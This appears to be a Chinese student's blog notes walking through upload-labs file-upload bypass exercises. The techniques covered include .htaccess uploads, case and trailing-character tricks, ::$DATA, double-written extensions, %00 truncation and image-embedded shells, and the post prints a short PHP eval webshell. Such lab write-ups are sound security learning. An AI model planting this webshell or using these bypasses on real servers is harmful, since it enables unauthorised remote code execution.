Loading... # 实训第五天 1. **Antsword连接虚拟机** ![image-20220715095225330.png](http://xherlock.top/usr/uploads/2022/07/2296134782.png) **Pass 4** **编写.htaccess文件** ![image-20220715101844886.png](http://xherlock.top/usr/uploads/2022/07/267230078.png) **上传.htaccess文件** ![image-20220715102013581.png](http://xherlock.top/usr/uploads/2022/07/3392278918.png) **修改后缀** ![image-20220715102213484.png](http://xherlock.top/usr/uploads/2022/07/2713811026.png) **加载图片,上传成功** ![image-20220715102317944.png](http://xherlock.top/usr/uploads/2022/07/2001934521.png) **Pass 5** **这一关吸取了上一关的教训增加了对.htaccess文件的限制** ![image-20220715103200235.png](http://xherlock.top/usr/uploads/2022/07/3409989020.png) **但是去掉了对大小写的限制,可以使用PHP后缀** ![image-20220715103547302.png](http://xherlock.top/usr/uploads/2022/07/2476148550.png) **上传成功** ![image-20220715103651019.png](http://xherlock.top/usr/uploads/2022/07/3193594947.png) **Pass 6** **吸取了上几关的教训:既过滤了.htaccess文件,又大小写转换了后缀;但是最后没有去掉后缀后的空格,存在绕过点** ![image-20220715104139473.png](http://xherlock.top/usr/uploads/2022/07/3672117741.png) **上传成功** ![image-20220715104256169.png](http://xherlock.top/usr/uploads/2022/07/3986283754.png) **Pass 7** **未对后缀末尾点号进行过滤** ![image-20220715105159972.png](http://xherlock.top/usr/uploads/2022/07/4121219999.png) **上传成功** ![image-20220715105227685.png](http://xherlock.top/usr/uploads/2022/07/1404698060.png) **Pass 8** 未去除字符串::\$DATA,截包后在php后加::$DATA ![image-20220715110344968.png](http://xherlock.top/usr/uploads/2022/07/3818580523.png) **Pass 9** **绕过空格和点** ![image-20220715140744661.png](http://xherlock.top/usr/uploads/2022/07/2862677265.png) ![image-20220715140820867.png](http://xherlock.top/usr/uploads/2022/07/1472045854.png) **Pass 10** **尝试大写PHP绕过,发现上传的文件后缀被删除** ![image-20220715141148581.png](http://xherlock.top/usr/uploads/2022/07/1601225756.png) **尝试双写绕过,注意php应该插入第一个p后面,即pphphp,如果插入h后:phphph,替换掉第一个遇到的php成了hph** ![image-20220715141451565.png](http://xherlock.top/usr/uploads/2022/07/994675715.png) **Pass 11** **url地址采用拼接方法存在绕过点** **改包:将请求行中路径补充上木马文件名,并且添加%00** **访问返回的shell路径,去除包含%00造成的乱码字符和后面一切字符,作为真正的shell路径** **编写shell** ```php <?php echo "hello xherlock"; eval($_REQUEST['pass']); ?> ``` ![image-20220715144438926.png](http://xherlock.top/usr/uploads/2022/07/2655713811.png) ![image-20220715145135927.png](http://xherlock.top/usr/uploads/2022/07/2507806778.png) **测试连接** ![image-20220715145720653.png](http://xherlock.top/usr/uploads/2022/07/2004698280.png) **Pass 12** **做法同Pass 11,不同点在于这关是POST方法改变save_path地方不一样,同时post不会像get对%00进行自动解码,需要对%00进行URL解码** **Pass 13** **首先制作图片马:copy blank.jpg /b + shell.php /a blankshell.jpg(blank.jpg图片最好为空白)** ![blankshell.png](http://xherlock.top/usr/uploads/2022/07/2540418140.png) **上传图片马并查看具体文件地址:** ![image-20220715160532176.png](http://xherlock.top/usr/uploads/2022/07/3284143168.png) **查看include.php文件内容:** ![includephp.png](http://xherlock.top/usr/uploads/2022/07/984362771.png) **编写参数传入图片马地址和cmd参数访问phpinfo** ![pass13-result.png](http://xherlock.top/usr/uploads/2022/07/538286973.png) **Pass 14-15** **可以直接按照上一关做** **Pass16** **使用老师发的gif文件木马** ![pass16-gif.png](http://xherlock.top/usr/uploads/2022/07/3193889161.png) **Pass 17** **从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。** 实训期间写的过于仓促,整体写的不好,下来补充upload-lab的分类学习 最后修改:2022 年 07 月 16 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 1 如果觉得我的文章对你有用,请随意赞赏